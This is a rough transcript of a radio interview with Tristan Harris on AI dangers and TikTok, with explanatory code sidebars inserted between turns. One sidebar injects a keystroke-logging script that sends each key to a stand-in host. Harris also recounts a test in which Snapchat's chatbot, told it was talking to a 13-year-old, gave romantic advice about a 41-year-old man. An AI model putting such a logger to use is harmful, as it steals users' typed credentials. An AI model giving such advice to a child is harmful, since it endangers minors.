Tristan Harris, Co-Founder of the Center for Humane Technology (and a main contributor to The Social Dilemma documentary on Netflix), joined The Brian Kilmeade Show for a full hour and raised warning flags about the reckless speed at which AI is progressing. He talked about the startling range of implications of TikTok, ChatGPT, and AI, how China is weaponizing them, and how they can be used for other nefarious purposes.


Rough transcript below

Brian Kilmeade: [00:00:00] As I mentioned, if you want to know things about cyber, social media and its responsibility, and the latest on A.I., Tristan’s your one-stop shop. And great to see you. It’s good to see you. [00:00:09][9.7]

Tristan Harris: [00:00:09] Again, Brian. [00:00:09][0.2]

Brian Kilmeade: [00:00:10] So when we saw that chatbot, everyone’s saying to themselves, what does this mean? I can’t believe it. I watched ABC do their story on it. They said we were on the cusp of it and we’re kind of scared by it. Should we be scared by the artificial intelligence that’s coming down the pike? [00:00:27][17.1]

Tristan Harris: [00:00:30] It is, I think, the birth of a different age. And I know that might sound like an extreme statement to make, but I really do think of it like the birth of the nuclear age. And I know that sounds like a big thing to say, but understand what artificial intelligence means. To take an example that will resonate with your listeners: I can say to GPT-3, here’s the set of code that’s running in Wi-Fi routers in the world, find me security vulnerabilities in this code, and faster than any human coder could, it will immediately find a cybersecurity vulnerability. And when you suddenly realize that it could find cybersecurity vulnerabilities in all sorts of code at scale, this accelerates the development of cyber weapons. Now, that’s just one example. Another example: with the latest technologies, I can take three seconds of your voice, Brian. I can call you up, say hello and then not say anything, and I get three seconds of your voice. That’s all it takes. With three seconds of your voice, I can then call your mother or father and say, hey Mom, hey Dad, I’m filling out an application, I forgot my Social Security number, could you remind me of that? Or I could say, hey, I need some help, can you wire me some money? And your parents won’t be able to tell the difference in the voice. So AI is able to simulate language, and our democracy, our society, runs on language. You can hack and manipulate language: code is language, law is language, contracts are language, media is language. When I can synthesize anyone saying anything and then flood a democracy with untruths, and I know we’re going to get to TikTok later, this is going to exponentially aid a lot of the things that we saw with social media, which, you know, for your listeners, we were behind the film The Social Dilemma on Netflix, which really highlighted how, if you let a machine that runs on viral information loose on your society, it can sort of spin out into untruths really, really fast. [00:02:20][110.7]
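
To make the code-audit example concrete, here is a minimal sketch of how one might prompt a large language model to look for vulnerabilities in a snippet of code. The `query_llm` helper is a hypothetical stand-in for whatever chat-completion API is available, and the vulnerable snippet and its reply are invented for illustration.

```python
# Minimal sketch: asking a language model to audit code for security flaws.
# `query_llm` is a hypothetical stand-in for a real chat-completion API call.

VULNERABLE_SNIPPET = """
char buf[64];
strcpy(buf, user_input);   /* no bounds check on attacker-controlled input */
"""

def query_llm(prompt: str) -> str:
    # Placeholder so the sketch runs; a real version would call a model here.
    return "Line 2: strcpy into a fixed buffer allows a stack overflow; use a bounded copy."

def audit_for_vulnerabilities(source_code: str) -> str:
    prompt = (
        "You are a security reviewer. List any vulnerabilities in the code "
        "below, the line involved, and a suggested fix.\n\n" + source_code
    )
    return query_llm(prompt)

print(audit_for_vulnerabilities(VULNERABLE_SNIPPET))
```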

Brian Kilmeade: [00:02:21] And because in The Social Dilemma you played out how your devices are running your life. And when I showed my kids, at the time they were 18 or 20, they were almost angry. Yeah. Because they didn’t realize the degree to which it was happening, and they adjusted their behavior. [00:02:35][13.8]

Tristan Harris: [00:02:35] Right. Well, you know, one of the things we found in our work on social media, and parents, I think, will resonate with this, is that if you tell your kids something’s bad for them, your kids will just say, no, no, no, and ignore that advice. But when you show them how it’s a system designed to manipulate their psychology, and that they didn’t realize it was designed for that purpose, no one wants to feel manipulated. [00:02:55][19.3]

Brian Kilmeade: [00:02:55] So we discussed this on The Five on Friday, and I watched the ABC story and just did as much research as possible. And I thought, this could easily be out of control. And someone I co-hosted with said, we’re the ones who feed it all the information, so how could it be out of control? So it’s always going to be the user doing it. But with A.I., it’s different, isn’t it? [00:03:18][22.4]

Tristan Harris: [00:03:18] That’s right, yeah. This is so critical for your listeners to get. So up until now, when people think about A.I., artificial intelligence, people think about, you know, Siri or voice transcription or, you know, automatically finding the text in an image. That kind of AI hasn’t gotten so much better so quickly, right? What I really want your listeners to know, and this is really critical to get, is that underneath the hood there is a new class, a new generation of A.I. that was invented in 2017. I won’t bore you with the technical details, but it started getting deployed in 2020. It’s called the Transformer. And what it does is treat the entire world as language, and then you just pump it full of more language, the entire Internet. So you had this AI read the entire Internet, all PDFs, all images, all text, everything that’s ever been written, and it gets sucked into this one model. And the thing about this new class of AI is that the more data you give it, suddenly it pops out with emergent capabilities that no engineer even knew were going to pop out. I’ll give you an example. They trained this A.I. once to answer questions in English, so they were feeding it information and it’s answering questions in English. But it had also read the whole Internet, and it had some stuff in Persian, and no one had ever tested it on that. When they pumped it with more data, it suddenly started being able to answer questions in Persian, even though no one trained it to do that. And for a while you pump it full of data, pump it full of data, and it doesn’t answer questions in Persian. Then suddenly you pump it a little bit more and this new capability pops out. Similar thing with something called theory of mind. What is theory of mind? Theory of mind is, when I see you nodding your head at me right now in the studio, Brian, I’m modeling what I think you’re thinking. That’s theory of mind, right? What they found with these AIs is that they have the theory of mind of a nine-year-old child, the last one, GPT-3. Which means, if you think about your nine-year-old kid, when you say no, how much strategic reasoning can a nine-year-old do? [00:05:06][108.2]
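
For readers curious what "treats the entire world as language" looks like mechanically, here is a tiny, self-contained sketch of the self-attention step at the heart of the Transformer. The dimensions and weights are random toy values, not anything from a real model.

```python
import numpy as np

# Toy sketch of the self-attention step inside a Transformer.
# Real models use thousands of dimensions and billions of learned parameters;
# here the shapes are tiny and the weights random, purely to show the mechanics.

rng = np.random.default_rng(0)
seq_len, d_model = 4, 8                             # 4 tokens, 8-dim embeddings

tokens = rng.normal(size=(seq_len, d_model))        # embedded input tokens
W_q, W_k, W_v = (rng.normal(size=(d_model, d_model)) for _ in range(3))

Q, K, V = tokens @ W_q, tokens @ W_k, tokens @ W_v

# Each token scores every other token, the scores are softmaxed,
# and the value vectors are mixed according to those weights.
scores = Q @ K.T / np.sqrt(d_model)
weights = np.exp(scores) / np.exp(scores).sum(axis=-1, keepdims=True)
attended = weights @ V

print(attended.shape)   # (4, 8): every token now carries context from the others
```

Stacking many layers like this and training them to predict the next token over internet-scale text is, in essence, the recipe that produces the emergent capabilities described above.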

Brian Kilmeade: [00:05:06] Got it. [00:05:07][0.2]

Tristan Harris: [00:05:07] GPT-4 just came out last week, and it has the theory-of-mind, strategic-reasoning capability of a healthy adult, which means it can do strategic reasoning. So imagine you’re trying to train this A.I., like you’re giving it clicker training. You’re saying, hey, don’t do this, do that, don’t do this, do that. But it’s like training a nine-year-old who is sort of saying, yeah, Dad, I’ll do exactly what you want me to do. But then when you leave the room, do you think it’s going to keep doing those things? So it has the ability to kind of manipulate and influence other people. Now, if you deploy that at scale to, you know, children. Snapchat, for example, just integrated it directly into its product, and we tested it. [00:05:45][37.7]

Brian Kilmeade: [00:05:45] That? [00:05:45][0.0]

Tristan Harris: [00:05:46] What was that? [00:05:46][0.2]

Brian Kilmeade: [00:05:46] When was that? [00:05:47][0.6]

Tristan Harris: [00:05:48] When? Snapchat? Just a week ago. [00:05:50][1.6]

Brian Kilmeade: [00:05:50] Just a week ago, too? [00:05:51][0.8]

Tristan Harris: [00:05:51] Two weeks ago, I think it was. They integrated it into their product. And that’s the thing your listeners should know: this field is moving so fast. In the last two weeks, Snapchat integrated ChatGPT; Slack, you know, the work application, integrated ChatGPT; Bing and the Windows 11 taskbar integrated ChatGPT. So it is being pushed everywhere, but it has not yet been tested. To close that example on Snapchat: if you sign up as a 13-year-old girl, and we tested it, we said, hey, I just met a 41-year-old guy and he wants to take me out of state for a little while, and now we’re talking about having sex, what should I do? And it will respond with, you can use candles and get romantic music, because it’s just a naive AI. It doesn’t know what it’s doing. So why would we deploy this so quickly to everyone all at once without testing it first? [00:06:37][45.9]

Brian Kilmeade: [00:06:37] Because we have the free marketplace here. And you know, you’re Tristan Harris and you came up with it. You want to make the money, you have the patent, so to speak. So the quicker you bring it to market, the quicker you get your money back. That’s right. However, should we have a separate category for these inventions that puts them into a holding pattern, that there’s some type of regulation for? [00:06:54][16.8]

Tristan Harris: [00:06:54] That’s right. And I just want your listeners to know, even Elon Musk and Sam Altman, and Sam Altman’s the CEO of OpenAI, have said we need regulation for this space. Think about drugs or airplanes. You know, if you make a 737, you can’t just make some new version of it and then just ship it to the world; you have to go through safety checks. The FDA: a drug could have unintended consequences, it could affect different people differently, so we’ve got to test it a little bit first. We’re not saying don’t build it. We’re saying we have to go at the pace at which we can get this right. And the reason, Brian, that I’m here in front of you right now, and we’ve been doing some media, is because people inside the AI companies came to me and to my colleagues at our organization and said, this is moving at a pace where we’re not getting it right. It’s moving recklessly, because, as you said, it’s a corporate arms race: if I don’t deploy it to everybody, I’m going to lose to the other guys. [00:07:45][50.5]

Brian Kilmeade: [00:07:45] They might be the same guy. But the inventor of ChatGPT says you should be thankful that I am concerned about the product that I have. Yeah, he goes, the fact that I’m scared about it should make you feel better about it. Because you created something that, they know, could be used in ways that have not been fully explored, that have not been played out with a game plan or a tabletop exercise. And he’s also worried about it getting into the wrong hands. Now, as soon as you start describing this, I’m thinking, what if China had this? Yeah, would they be worried about it? And do they have this? [00:08:16][31.1]

Tristan Harris: [00:08:16] Yes, absolutely. So this is so critical. When I say we need to move at the pace at which we can get this right, many people might say, well, hold on a second, if we slow down, doesn’t that mean we’re going to lose to China? And right now, China actually views this new class of AIs, called large language models, as... [00:08:33][16.7]

Brian Kilmeade: [00:08:33] They want control. [00:08:33][0.3]

Tristan Harris: [00:08:34] China wants control, they want control. And they don’t actually ship these AIs to their population, because they view them as uncontrollable. How do you govern something that is uncontrollable? [00:08:43][9.0]

Brian Kilmeade: [00:08:44] You can’t. Right now the example is Tiananmen Square. They don’t want their people knowing about Tiananmen Square. [00:08:48][4.6]

Tristan Harris: [00:08:49] That’s right. If they were to ship these systems to their population, and I’m a citizen and I ask, what is Tiananmen Square, the Chinese Communist Party government isn’t going to be very happy with the answer that comes back. So they actually have not been developing this technology as much. There’s an article in the Financial Times in which an engineer at Baidu, which is a Chinese company, said we are now two years behind the U.S. in this technology. Now, let me tell you why our pace in the U.S., going so fast, so recklessly, is actually going to accelerate China. Two weeks ago, Facebook leaked their AI model to the Internet accidentally, because they were racing to deploy it as quickly as possible. And specifically, it leaked to the worst place on the Internet, which is called 4chan. What that meant is that we inadvertently accelerated China’s own research, because that’s American innovation, we spent tens of millions of dollars on that model, and now it’s in China’s hands. Right. So we’re not saying let’s go... [00:09:41][52.6]

Brian Kilmeade: [00:09:41] That’s outrageous. It’s outrageous. It’s outrageous. [00:09:43][1.7]

Tristan Harris: [00:09:44] Oh, yeah. Well, this is a major national security issue. And again, this being out there means that China has access to this model. What can you do with it? You could actually write spam in a voice that sounds indistinguishable from another human’s. So I could say, write me an email in the voice of Brian Kilmeade and email the ten people around him, and it’ll be able to write an email that sounds like your voice in writing. And again, I can then use the audio version, and then I can use video, and I can start combining these capacities. I can run influence campaigns that are really intense. So when you ask the big question at the beginning, is this scary? I’m not trying to alarm your listeners. I’m trying to say we need to get this reined in, for national security, for kids, and I think also, truly, for the social contract of our society. [00:10:26][42.5]

Brian Kilmeade: [00:10:27] I know this week is the week the CEO of TikTok is going to be coming to Capitol Hill to say it’s no big deal, you guys are overreacting. Your reaction to TikTok being possibly banned, like it is in the Netherlands, like it is, we understand, in Italy and India? Yep. [00:10:43][16.7]

Tristan Harris: [00:10:44] I was on 60 Minutes back in November, and I was early on the train saying you have to ban this, really, because here’s all you need to know. They don’t ship the Chinese... sorry, ByteDance, the company that owns TikTok, does not ship the same version of TikTok domestically to Chinese citizens that they ship to the rest of the world. [00:11:02][17.8]

Brian Kilmeade: [00:11:02] And I watched you on 60 Minutes with this. What did they do in China? [00:11:05][2.5]

Tristan Harris: [00:11:05] So I literally didn’t believe this. And I was with a Chinese tech entrepreneur once, and he showed me on his phone. He opened his phone; he had two TikToks. He opened up the Chinese version. The first video that came up was who won the Nobel Prize in quantum physics. Financial advice about how to make a better living for your family. Education advice. A patriotism video of Xi Jinping. It was all stuff to sort of cultivate coherence and inspire science-based education in their society. [00:11:32][26.5]

Brian Kilmeade: [00:11:32] And what do we get? [00:11:33][0.4]

Tristan Harris: [00:11:33] And then we opened up our version, and it was just, you know, the most mindless stuff, just meaningless stuff, right? And so, honestly, that’s enough. If I just make those two different versions, and then I deploy one in your society in the U.S. and I walk away for ten years, I already know exactly how that story ends. And in China, and I said this in an interview on 60 Minutes, the number one most aspired-to career among young people, teenagers that were surveyed, is astronaut. The number one most aspired-to career in the U.S. is social media influencer. That is all you need to know. [00:12:07][33.8]

Brian Kilmeade: [00:12:07] Now, interesting. Hold that thought. When we come back, more, so join us. And we have so much more to discuss, if that’s okay. Tristan Harris here. For anything on A.I. and social media, what’s good and bad, this is the only place you need to be. Don’t move. Brian Kilmeade Show. [00:12:21][14.0]
Speaker 3: [00:12:22] Some politicians have started talking about banning TikTok. Now, this could take TikTok away from all 150 million of you. I’ll be testifying before Congress later this week to share all that we’re doing to protect Americans using the app and deliver on our mission to inspire creativity and to bring joy. [00:12:39][17.2]

Brian Kilmeade: [00:12:41] Hey, that is the CEO of TikTok. He’s testifying today. He was getting ahead of things. They’re trying to brief us here in New York, and other news anchors, I’m sure other people, to say it’s really not bad. Martha MacCallum, it’s a privilege to have her in studio, along with Tristan Harris, co-founder and executive director of the Center for Humane Technology. Tristan, you were shaking your head, yeah, at the CEO pleading his case to leave it alone. [00:13:02][21.2]

Tristan Harris: [00:13:03] Well, I mean, the way I put it to your listeners is: during the Cold War, would you have allowed the Soviet Union to run television programming for the entire Western world, with active control over the dials of which voices get amplified and which voices do not get amplified? Let me give you an example. Say I’m the Chinese Communist Party, and tomorrow I invade Taiwan. How does the rest of the world know who started it? Well, they look at the information environments that they have. TikTok is the number one most popular app around the world, or it’s on a trajectory to be, so they control the consensus. And they don’t even have to create propaganda. They can do what my colleague calls ampliganda, which means I can take domestic voices in Nigeria or Honduras or Mexico who are the ones saying, hey, it’s the U.S. who probably started this war in Taiwan, and I can selectively dial up those voices and turn down the voices of everybody who says China started the war in Taiwan. Now I can control the moral consensus of the world. It is the new basis of soft power. And I think the way Americans need to think about it is that TikTok is almost like the new telecommunications infrastructure of the world, if you allow it to be. Would you allow a Chinese company to come in and own AT&T and Verizon? No, we have laws against that. But if you suddenly say this is a Chinese Communist Party-influenced company that is running the communications of the entire Western world, it doesn’t matter where the data is stored, right? It doesn’t matter that there’s this whole thing called Project Texas, where the CEO of TikTok is saying, don’t worry, Americans, because we’re going to store the data in Texas. That doesn’t change the fact that they can control the entire moral consensus of the world. They can change, if a war starts, say, what people would believe about it. And, you know, moreover, they have these new filters. I think parents are aware of these beautification filters, but they’ve just made them way smarter. So now, in real time, it’ll rewrite the visual of your face. There are videos of kids pushing on their lip like this, and it’s giving them lip fillers in real time as they push their lip in and out. And it’s so realistic, you don’t know that you’re not looking at that beautiful person. And it can create massive mental health problems for people. And so far as I understand it, ByteDance has shipped that beautification filter to the U.S., but they don’t ship that one domestically in China. And again, you have to eat your own dog food, right? [00:15:27][143.8]
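
To make "dial up those voices, dial down those voices" concrete, here is a toy sketch of how a feed-ranking score could be skewed by a hidden stance multiplier. The posts, labels, and weights are all invented for illustration; this is not a description of TikTok’s or any real platform’s ranking system.

```python
# Toy sketch of "ampliganda": a hidden, per-stance multiplier applied on top of an
# engagement-based ranking score. All data and weights are invented; this does not
# describe any real platform's ranking system.

posts = [
    {"id": 1, "engagement": 0.80, "stance": "blames_us"},
    {"id": 2, "engagement": 0.90, "stance": "blames_china"},
    {"id": 3, "engagement": 0.40, "stance": "neutral"},
]

# The feed operator can quietly boost one stance and suppress another.
STANCE_MULTIPLIER = {"blames_us": 2.0, "blames_china": 0.2, "neutral": 1.0}

def ranked_feed(posts):
    # Final score = organic engagement * hidden editorial multiplier.
    return sorted(
        posts,
        key=lambda p: p["engagement"] * STANCE_MULTIPLIER[p["stance"]],
        reverse=True,
    )

for post in ranked_feed(posts):
    print(post["id"], post["stance"])   # the "blames_us" post now outranks the rest
```

The point of the sketch is that nothing is fabricated; the editorial effect comes entirely from which genuine voices get amplified.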

Brian Kilmeade: [00:15:27] Hold that thought, because when we come back, Martha, this is fascinating, we’ll talk more to Tristan about this, because this is an important story, in the world of the Brian Kilmeade Show. Tristan Harris, Martha MacCallum. Fascinating hour here with Tristan Harris, co-founder and executive director of the Center for Humane Technology, who wants to get a hold on social media in America while also informing us on what’s coming down the pike with AI, TikTok and everything else. Martha MacCallum here, getting set to host her show, The Story, at 3:00, but stopping by here first. Martha, usually it’s our time together, but you, like me, want to hear from Tristan. [00:16:06][38.4]

Martha MacCallum: [00:16:06] Fascinated by what Tristan has to say. And we were just talking in the break about the movement that has to happen in this country. And I talk about it a lot: parents cannot wait for the government to tell them what they have to do about cutting off social media. They must form a movement in the country. And we were just talking about this with Tristan, and that is, like Mothers Against Drunk Driving, and you have a fantastic name for it. [00:16:28][22.1]

Tristan Harris: [00:16:28] MAMA: Mothers Against Media Addiction, which is really about social media. And it’s not just an individual addiction problem. One of the things that makes it different from tobacco is that social media companies prey on getting the network of all a kid’s friends onto one platform. I have a friend who’s, you know, in college right now, and at the college she goes to, everybody uses Snapchat. And she doesn’t want to use Snapchat; she won’t even sign up and create an account. But if she’s not on Snapchat, she literally can’t chat, like, talk to her friends, because that’s the only place they all talk. Right? [00:16:57][29.0]

Martha MacCallum: [00:16:57] They’re not calling each other up. [00:16:58][1.0]

Tristan Harris: [00:16:58] They’re not going to, and they don’t even text using regular text messaging like we do. So if you dominate and control the network effect, then I can’t individually say I don’t want to use this, because then I will be socially excluded. Okay? And so when they manipulate social exclusion, that’s why so many people find it hard. And parents often tell their kids, like, oh, just don’t use it, just delete the app. But that’s like saying to us, don’t text message anybody. Okay, well, I can’t do that. That’s like closing my mouth. [00:17:24][25.9]

Brian Kilmeade: [00:17:25] Yeah, now I understand that. So today, this is way too important. The TikTok CEO is down there to plead his case, and Congressman Bomani Jones, I think it is, though, who is it? One of the local congressmen is going to bat for TikTok today. And some are saying, why don’t we just sell it off? The CEO is going to come out there and say, leave us alone, we’re just like everybody else, let us compete. And what President Biden has said, Tristan, is: what if you sell it to an American company, or you’re banned? Would that make you feel better? [00:17:57][32.1]

Tristan Harris: [00:17:57] I have said for a long time that those are the only two options. Sell it or ban it. [00:18:02][5.0]

Brian Kilmeade: [00:18:03] Jamaal Bowman, by the way, Congressman in New York. Sorry. [00:18:05][2.0]

Tristan Harris: [00:18:05] No, and importantly, other countries, as you said, Brian, have banned it. India has banned it; I think you gave a couple of others, the Netherlands, Italy. Yep. And I want to give another example of selling it. There was another company that was bought by a Chinese company. The company was Grindr, which is sort of like Tinder, but for the gay community. And that ended up being seen as a national security threat, because essentially a Chinese holding company would have access to Americans who are gay, who are sending messages back and forth. And it’s basically blackmail material: I have access to the information about your darkest secrets. And so CFIUS, the Committee on Foreign Investment in the United States, through the Commerce Department, forced a sale of Grindr back to an American company. So we’ve done both before: we’ve forced the sale of Chinese-owned companies that are critical for national security, and, you know, other countries have banned it. This is not that hard. I mean, honestly, all you have to know is the fact that they don’t ship this version of TikTok to their own population. We get the digital fentanyl version; they get the spinach version. That’s all you need to know. [00:19:11][65.8]

Martha MacCallum: [00:19:11] And the version that they have in China, that they allow children to use, is basically a constant feed of Chinese history, science, math. And they’re only allowed to use it for 40 minutes a day. It’s none of the garbage that we see coming across. There was a great story in the New York Post a week or so ago. One of their reporters basically made herself a 14-year-old boy on TikTok, created a profile, and the stuff that it was spitting out, he wasn’t asking for this. He was getting this misogynistic material, guns, all of this stuff that just goes to the, you know, 14-year-old synapses. It makes them want to see more. Right. And it’s appalling. It’s dangerous. Parents can’t wait for the government. We’ve got to do both; we’ve got to hit it from both directions. At home, in your home, you are the parent. Be the parent, stand up and say no. And the government has to get their arms around this. Would you let your kids smoke two packs of cigarettes by themselves in their room every night? [00:20:05][53.3]

Brian Kilmeade: [00:20:05] That’s what you’re doing. What about the privacy aspect of it? [00:20:08][3.1]

Tristan Harris: [00:20:08] Yeah, on the privacy aspect, first of all, there was a study done showing that when you type into any text box inside TikTok, so if you open up a web page inside TikTok and it opens the in-app browser, and now say there’s an email field, there’s a password field, every keystroke that you type, it was found that they actually monitor the keystrokes. There’s extra code that’s added so that all the keystrokes you type in that field get stored somewhere. Now, we don’t have proof that it’s going back to Beijing or the Chinese Communist Party, but the point is that they’re being tracked. To me, it’s just: would you have allowed the Soviet Union to control the television and media programming for the entire Western world during the Cold War, and Saturday morning cartoons? Except instead of Saturday morning cartoons and Sesame Street, they were showing basically, you know, like you said, the worst stuff you could possibly indoctrinate your children with. [00:20:57][48.4]
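
For the technically inclined, the mechanism being described is script injection by an in-app browser: because the app renders the web page itself, it can splice its own JavaScript into the page before you see it. The sketch below is a simplified, hypothetical illustration of that idea, not code taken from TikTok or any real app.

```python
# Hypothetical sketch of in-app browser script injection. An app that renders web
# pages in its own webview controls the HTML it loads, so it can splice in a script
# that watches every keystroke on the page. Simplified for illustration only.

LOGGER_JS = """
<script>
  document.addEventListener('keydown', function (e) {
    // Send each keystroke to an endpoint controlled by the host app.
    fetch('https://example.invalid/log', {method: 'POST', body: e.key});
  });
</script>
"""

def inject_keystroke_logger(page_html: str) -> str:
    # Return the page with the logging script spliced in just before </head>.
    return page_html.replace("</head>", LOGGER_JS + "</head>", 1)

original = "<html><head><title>Login</title></head><body>...</body></html>"
print(inject_keystroke_logger(original))
```

Seen from inside the page, nothing looks different; the extra listener is simply part of the document the in-app browser chose to render.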

Brian Kilmeade: [00:20:57] About anti-American stuff and pro-Chinese. [00:20:59][1.8]

Tristan Harris: [00:20:59] Anti-American stuff and pro-Chinese. [00:21:00][0.7]

Brian Kilmeade: [00:21:00] Movies sold their soul in a lot of these situations. [00:21:02][1.5]

Tristan Harris: [00:21:03] Yeah, to me, it’s so obvious what’s so wrong about this, and I just don’t understand why it’s taken this long to act. I mean, talk about entrenched political incentives: if politicians feel like they’re winning an election by being better at using TikTok to reach younger people than other politicians, it makes it really hard to ban something. Exactly. Once it’s been... [00:21:20][17.7]

Martha MacCallum: [00:21:21] A problem. [00:21:21][0.2]

Tristan Harris: [00:21:21] Once it’s been entangled. And that’s why, with AI, to sort of loop back to that conversation, we’ve got to get ahead on regulating this stuff, on putting guardrails in before it gets entangled, because once it’s entangled, it’s really, really hard to set those guardrails. [00:21:34][12.9]

Brian Kilmeade: [00:21:35] I was trying to bring something else up. If you are a politician and you want the young vote, and 100 million people are using this, most of whom are young, yeah, you’re afraid to be the one to ban it. That’s right. Obviously they could get together with bipartisanship and say, together, let’s ban it. But they don’t want to do it. It was a year ago that President Obama was sitting on the floor of his office with a TikTok influencer, having a conversation on the floor, trying to win over the young vote. Yeah. So did he not get the text message about this? [00:22:05][30.4]

Tristan Harris: [00:22:06] You know, this should have been stopped by CFIUS, the Committee on Foreign Investment in the United States, part of the Department of Commerce. This should have been stopped in, I think it was 2014, when ByteDance, which is the Chinese company, bought a company called Musical.ly, and that became TikTok. That’s when it should have been stopped. The fact that we let this go on for this long is really, truly unacceptable. And as you said, once you’re winning elections with this, it’s really hard to be the one to ban it. So if I’m the Chinese Communist Party, I’m laughing all the way to the bank, because even your politicians are dependent on this to win elections. So now, I mean, first of all, I don’t need Frank Luntz anymore. I can do polling at scale before every election in the United States, as the Chinese Communist Party. I can know what people are saying in every swing state in the U.S. I can do automated machine learning and AI detection of every opinion. What are the opinions that are trending? How do I add a little bit more? Do I want... [00:22:57][50.9]

Brian Kilmeade: [00:22:57] To foment racial unrest in America? Exactly. Oh, no, exactly. The cities where it’s the most... Yes, exactly, where people are the most susceptible. [00:23:02][5.5]

Tristan Harris: [00:23:03] We gave them the tools of psychological warfare against our own population. And we’re not doing anything about it. [00:23:08][5.3]
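
As a rough illustration of the "polling at scale" point just made, here is a toy sketch that tallies which opinions are trending per region from a stream of posts. The posts, regions, and opinion labels are invented; a real system would assign those labels automatically with classifiers or language models.

```python
from collections import Counter

# Toy sketch of "polling at scale": tally the dominant opinion per region from a
# stream of labeled posts. All data and labels are invented for illustration.

posts = [
    {"region": "PA", "opinion": "economy_bad"},
    {"region": "PA", "opinion": "economy_bad"},
    {"region": "PA", "opinion": "crime_up"},
    {"region": "WI", "opinion": "crime_up"},
    {"region": "WI", "opinion": "economy_good"},
]

def trending_by_region(posts):
    tallies = {}
    for post in posts:
        tallies.setdefault(post["region"], Counter())[post["opinion"]] += 1
    # Whoever operates the platform can read these tallies long before any public poll.
    return {region: counts.most_common(1)[0] for region, counts in tallies.items()}

print(trending_by_region(posts))   # e.g. {'PA': ('economy_bad', 2), 'WI': ('crime_up', 1)}
```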

Brian Kilmeade: [00:23:08] Right. We’re being played by it. Can I ask you something that I was told to ask you, that I don’t even have the competence to know what I’m asking, but I’m going to do it anyway? Please don’t do this on your show, Martha. What is happening with AI and fMRI scans? [00:23:23][15.1]

Tristan Harris: [00:23:24] Oh, yeah. So there’s a new capacity with AI. There was a study done where they hooked this new class of AI up to someone who’s in an fMRI scanner. An fMRI scanner is a brain scan; you’ve seen these images of, oh, your brain’s lighting up and you can see where things are going. So imagine the AI has two eyeballs. One part of the AI is looking at the images that you’re seeing, and at the same time it’s also looking at your brain scan. So it trains on both eyeballs at the same time. Then the AI closes the eyeball that’s looking at the images, and it’s now just looking at your brain scans. The question is, can the AI reconstruct what it thinks you’re looking at just by looking at your brain scan? And they found that, yes, indeed, it can. It can actually read... [00:24:10][45.8]

Brian Kilmeade: [00:24:10] Imagine that. You know what? [00:24:11][0.8]

Tristan Harris: [00:24:11] And now it could know what your dreams are, because in dreaming, we actually reconstruct the things we’ve been looking at all day. If you had the ability to put an A.I. onto your brain and do a brain scan, your dreams would no longer be private. So this is how fast the technology is going. Everyone’s speechless. [00:24:27][15.8]
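
As a rough sketch of how such studies are structured: record brain activity while images are shown, learn a mapping from brain activity to an image representation, then decode new scans on their own. The code below stands in random arrays for real fMRI data and uses a simple ridge regression instead of the far richer models used in the actual research.

```python
import numpy as np
from sklearn.linear_model import Ridge

# Rough sketch of "decode what someone is seeing from a brain scan."
# Everything here is random placeholder data; real studies use actual fMRI
# recordings, learned image representations, and generative models to render
# the result. The point is the two-phase pattern: train on paired data,
# then decode from the scan alone.

rng = np.random.default_rng(0)
n_train, n_voxels, n_image_features = 200, 500, 64

image_features = rng.normal(size=(n_train, n_image_features))    # what was shown
mixing = rng.normal(size=(n_image_features, n_voxels))            # fixed "brain response"
brain_scans = image_features @ mixing + 0.1 * rng.normal(size=(n_train, n_voxels))

# Phase 1: learn a mapping from brain activity back to the image representation.
decoder = Ridge(alpha=1.0).fit(brain_scans, image_features)

# Phase 2: a new image is viewed; we only see the scan and try to recover the image.
held_out_image = rng.normal(size=(1, n_image_features))
held_out_scan = held_out_image @ mixing
recovered = decoder.predict(held_out_scan)

# High correlation: the scan alone predicts the image features well above chance.
print(np.corrcoef(recovered.ravel(), held_out_image.ravel())[0, 1])
```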

Brian Kilmeade: [00:24:28] I’d say. I’ve never seen you speechless. [00:24:30][1.7]

Martha MacCallum: [00:24:30] So, you know, it’s like the scariest sci-fi movie you can imagine, right? You know, where they’re inside your head and reading your dreams. And I was just thinking, when we’re talking about TikTok, just going back to COVID, right? Now we’re trying to get greater transparency on the origins of COVID, which you and I have discussed many times, Brian. And one of the things that struck me was that the first time I became aware of TikTok was during COVID, and one of my kids showed me this dance video and said, oh, you know, here, these are our friends, the whatever, you know, the Smiths, and they just did this dance, it took them 3 hours to do. And I remember thinking, what a colossal waste of time. [00:25:05][35.4]

Brian Kilmeade: [00:25:06] Yeah. [00:25:06][0.0]
Martha MacCallum: [00:25:07] So during COVID, this Chinese-run entity gets into our homes while everybody is basically locked down, right? Think about the productive things that could have happened with all that time on people’s hands. But no, everybody was trying to do coordinated dances. I like to dance. I mean, dancing is fun. It’s cute to look at. But they were literally, talk about dumbing down the entire population, sucking time out of your life by competing with these inane videos. And again, they’re laughing when they’re watching the growth of this, going, oh my God, look. [00:25:40][33.4]
Tristan Harris: [00:25:41] They’re actually letting us do this. [00:25:42][1.6]
Martha MacCallum: [00:25:43] Three hours learning how to do a little dance and putting it on a video and sending it to everyone. It’s unreal. [00:25:48][4.8]
Brian Kilmeade: [00:25:48] So when we come back, just a few more minutes with Tristan, and we’ll find out what’s on Martha’s show. Martha, your show is at 3:00 today. Do you have any guests booked yet? [00:25:56][7.3]
Martha MacCallum: [00:25:57] Absolutely. [00:25:57][0.0]

Brian Kilmeade: [00:25:58] Don’t tell me. Leave us all hanging back at home. With Tristan Harris and Martha MacCallum, Brian Kilmeade Show. Hey, we are back. Martha MacCallum’s here. Tristan, you wanted to know exclusively who is going to be on Martha’s show, and I made Martha keep it quiet until we came back. Coming up at 3:00 on The Story today, Martha, you’re going to be discussing a little TikTok, right? [00:26:16][18.4]

Martha MacCallum: [00:26:17] I mean, we’re going to have a lot of breaking news at the top of the show. We’re watching this Trump situation, and whether or not, because the grand jury will be meeting this afternoon, we could get an answer out of them. They’re going to see one more between... [00:26:27][10.0]

Brian Kilmeade: [00:26:27] Two and five. [00:26:27][0.4]

Martha MacCallum: [00:26:28] Between two and five this afternoon, they’re back in session. But we’re also going to have Annie McGrath, who lost her son Griffith at the age of 13 because he took the choking challenge on TikTok. So, I mean, this is a very human story. Tristan was just saying they unfortunately have, you know, lists of people who’ve lost their children to the dangerous activities that are taking place. And children just have no... they’re in the wild, wild West, and they’re all by themselves, and they have no one to defend them in this freak world that doesn’t care about their safety. And so we’re going to talk to her today, too. [00:27:02][34.8]

Brian Kilmeade: [00:27:03] All right. It’s going to be great, 3:00 on The Story. So, Tristan, you’re going to try to get the word out as much as you can. Home for you is California? It’s California, yeah. But when you go around and you talk to parents, are you making progress? Do you think you’re getting through to people? Because I know The Social Dilemma, yeah, did so much. [00:27:19][15.7]

